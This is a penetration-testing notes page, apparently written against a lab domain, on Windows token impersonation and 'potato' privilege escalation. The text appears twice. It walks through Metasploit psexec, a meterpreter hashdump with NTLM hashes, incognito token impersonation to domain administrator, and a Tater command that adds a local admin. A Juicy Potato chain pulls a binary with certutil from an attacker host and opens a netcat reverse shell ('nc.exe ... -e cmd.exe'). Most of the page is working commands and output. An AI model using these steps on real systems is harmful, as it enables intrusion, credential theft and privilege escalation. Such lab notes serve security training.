Token Impersonation - Potato attacks

What is it

Token are temp keys that give access to a system or network without credentials.

How to

Launch Metasploit msfconsole
Choose the exploit: use exploit/windows/smb/psexec
Set: rhosts, smbdomain, smbpass, smbuser, target (we can use show targets to have a list), payload
Launch the attack: run

We get a shell:

msf6 exploit(windows/smb/psexec) > run

[*] Started reverse TCP handler on 10.0.2.8:4444 
[*] 10.0.2.15:445 - Connecting to the server...
[*] 10.0.2.15:445 - Authenticating to 10.0.2.15:445|marvel.local as user 'fcastle'...
[!] 10.0.2.15:445 - peer_native_os is only available with SMB1 (current version: SMB3)
[*] 10.0.2.15:445 - Uploading payload... oeyrkyrs.exe
[*] 10.0.2.15:445 - Created \oeyrkyrs.exe...
[*] Sending stage (200262 bytes) to 10.0.2.15
[+] 10.0.2.15:445 - Service started successfully...
[*] 10.0.2.15:445 - Deleting \oeyrkyrs.exe...
[*] Meterpreter session 1 opened (10.0.2.8:4444 -> 10.0.2.15:61871 ) at 2022-02-11 13:49:12 -0500

meterpreter >

Getting hashes: hashdump

meterpreter > hashdump
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Frank Castle:1001:aad3b435b51404eeaad3b435b51404ee:64f12cddaa88057e06a81b54e73b949b:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:e6cedee56d27d175f48042b53cb6b242:::

Use tools: load (double tab to get the list of tools)

load incognito

Incognito Commands
==================

    Command              Description
    -------              -----------
    add_group_user       Attempt to add a user to a global group with all tokens
    add_localgroup_user  Attempt to add a user to a local group with all tokens
    add_user             Attempt to add a user with all tokens
    impersonate_token    Impersonate specified token
    list_tokens          List tokens available under current user context
    snarf_hashes         Snarf challenge/response hashes for every token

list_tokens -u

meterpreter > list_tokens -u

Delegation Tokens Available
========================================
Font Driver Host\UMFD-0
Font Driver Host\UMFD-1
Font Driver Host\UMFD-2
MARVEL\Administrator
MARVEL\fcastle
NT AUTHORITY\LOCAL SERVICE
NT AUTHORITY\NETWORK SERVICE
NT AUTHORITY\SYSTEM
Window Manager\DWM-1
Window Manager\DWM-2

Impersonation Tokens Available
========================================
No tokens available

Impersonate Administrator:

meterpreter > impersonate_token marvel\\administrator
[+] Delegation token available
[+] Successfully impersonated user MARVEL\Administrator
meterpreter > shell
Process 8576 created.
Channel 1 created.
Microsoft Windows [Version 10.0.19044.1288]
(c) Microsoft Corporation. All rights reserved.
C:\Windows\system32>whoami
whoami
marvel\administrator

If we hashdump again it will not work so we can rev2self to get back to the initial user
Any user that has logged in the target will have a token there until the target reboots

Potato Attacks

These attacks requires the SeImpersonatePrivilege or SeAssignPrimaryTokenPrivilege to be enabled on the machine.

Hot potato

powershell.exe -nop -ep bypass
Import-Module .\Tater.ps1
Invoke-Tater -Trigger 1 -Command "net localgroup administrators user /add"
Your user should be in the administrators group net localgroup administrators to check

Juicy potato

Enumeration after initial shell with MSSQL

Say we have a shell on an mssql instance mssqlclient.py sql_dev@IP-ADD -windows-auth
We can enable command shell using enable_xp_cmdshell
And then we will be able to type every command we need this way: xp_cmdshell whoami /priv
We do!

Exploitation

Let's get JuicyPotato binary in our attacking machine wget https://github.com/ohpe/juicy-potato/releases/download/v0.1/JuicyPotato.exe
Let's serve the file to our target using python http server python3 -m http.server 80
Let's take it in our shell using certutil xp_cmdshell certutil.exe -urlcache -f http://10.10.14.117/JuicyPotato.exe C:\Tools\JuicyPotato.exe
Let's get an admin shell xp_cmdshell c:\tools\JuicyPotato.exe -l 53375 -p c:\windows\system32\cmd.exe -a "/c c:\tools\nc.exe 10.10.14.117 8443 -e cmd.exe" -t * where -l is the COM server listening port, -p is the program to launch (cmd.exe), -a is the argument passed to cmd.exe, and -t is the createprocess call. We are trying both the CreateProcessWithTokenW and CreateProcessAsUser functions, which need SeImpersonate or SeAssignPrimaryToken privileges respectively.

Resources

PreviousPass the Password / Hash NextKerberos

Last updated 3 years ago

How to

Launch Metasploit msfconsole

Choose the exploit: use exploit/windows/smb/psexec

Set: rhosts, smbdomain, smbpass, smbuser, target (we can use show targets to have a list), payload

Launch the attack: run

We get a shell:

msf6 exploit(windows/smb/psexec) > run

[*] Started reverse TCP handler on 10.0.2.8:4444 
[*] 10.0.2.15:445 - Connecting to the server...
[*] 10.0.2.15:445 - Authenticating to 10.0.2.15:445|marvel.local as user 'fcastle'...
[!] 10.0.2.15:445 - peer_native_os is only available with SMB1 (current version: SMB3)
[*] 10.0.2.15:445 - Uploading payload... oeyrkyrs.exe
[*] 10.0.2.15:445 - Created \oeyrkyrs.exe...
[*] Sending stage (200262 bytes) to 10.0.2.15
[+] 10.0.2.15:445 - Service started successfully...
[*] 10.0.2.15:445 - Deleting \oeyrkyrs.exe...
[*] Meterpreter session 1 opened (10.0.2.8:4444 -> 10.0.2.15:61871 ) at 2022-02-11 13:49:12 -0500

meterpreter >

Getting hashes: hashdump

meterpreter > hashdump
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Frank Castle:1001:aad3b435b51404eeaad3b435b51404ee:64f12cddaa88057e06a81b54e73b949b:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:e6cedee56d27d175f48042b53cb6b242:::

Use tools: load (double tab to get the list of tools)

load incognito

Incognito Commands
==================

    Command              Description
    -------              -----------
    add_group_user       Attempt to add a user to a global group with all tokens
    add_localgroup_user  Attempt to add a user to a local group with all tokens
    add_user             Attempt to add a user with all tokens
    impersonate_token    Impersonate specified token
    list_tokens          List tokens available under current user context
    snarf_hashes         Snarf challenge/response hashes for every token

list_tokens -u

meterpreter > list_tokens -u

Delegation Tokens Available
========================================
Font Driver Host\UMFD-0
Font Driver Host\UMFD-1
Font Driver Host\UMFD-2
MARVEL\Administrator
MARVEL\fcastle
NT AUTHORITY\LOCAL SERVICE
NT AUTHORITY\NETWORK SERVICE
NT AUTHORITY\SYSTEM
Window Manager\DWM-1
Window Manager\DWM-2

Impersonation Tokens Available
========================================
No tokens available

Impersonate Administrator:

meterpreter > impersonate_token marvel\\administrator
[+] Delegation token available
[+] Successfully impersonated user MARVEL\Administrator
meterpreter > shell
Process 8576 created.
Channel 1 created.
Microsoft Windows [Version 10.0.19044.1288]
(c) Microsoft Corporation. All rights reserved.
C:\Windows\system32>whoami
whoami
marvel\administrator

If we hashdump again it will not work so we can rev2self to get back to the initial user

Any user that has logged in the target will have a token there until the target reboots

Potato Attacks

These attacks requires the SeImpersonatePrivilege or SeAssignPrimaryTokenPrivilege to be enabled on the machine.

Hot potato

We can use

powershell.exe -nop -ep bypass

Import-Module .\Tater.ps1

Invoke-Tater -Trigger 1 -Command "net localgroup administrators user /add"

Your user should be in the administrators group net localgroup administrators to check

See an example of a potato attack

Juicy potato

Enumeration after initial shell with MSSQL

Say we have a shell on an mssql instance mssqlclient.py sql_dev@IP-ADD -windows-auth

We can enable command shell using enable_xp_cmdshell

And then we will be able to type every command we need this way: xp_cmdshell whoami /priv

For juicy potato we need to check if we have SeImpersonatePrivilege enabled

We do!

Exploitation

Let's get JuicyPotato binary in our attacking machine wget https://github.com/ohpe/juicy-potato/releases/download/v0.1/JuicyPotato.exe

Let's serve the file to our target using python http server python3 -m http.server 80

Let's take it in our shell using certutil xp_cmdshell certutil.exe -urlcache -f http://10.10.14.117/JuicyPotato.exe C:\Tools\JuicyPotato.exe

Let's get an admin shell xp_cmdshell c:\tools\JuicyPotato.exe -l 53375 -p c:\windows\system32\cmd.exe -a "/c c:\tools\nc.exe 10.10.14.117 8443 -e cmd.exe" -t * where -l is the COM server listening port, -p is the program to launch (cmd.exe), -a is the argument passed to cmd.exe, and -t is the createprocess call. We are trying both the CreateProcessWithTokenW and CreateProcessAsUser functions, which need SeImpersonate or SeAssignPrimaryToken privileges respectively.

And we should have an authority system shell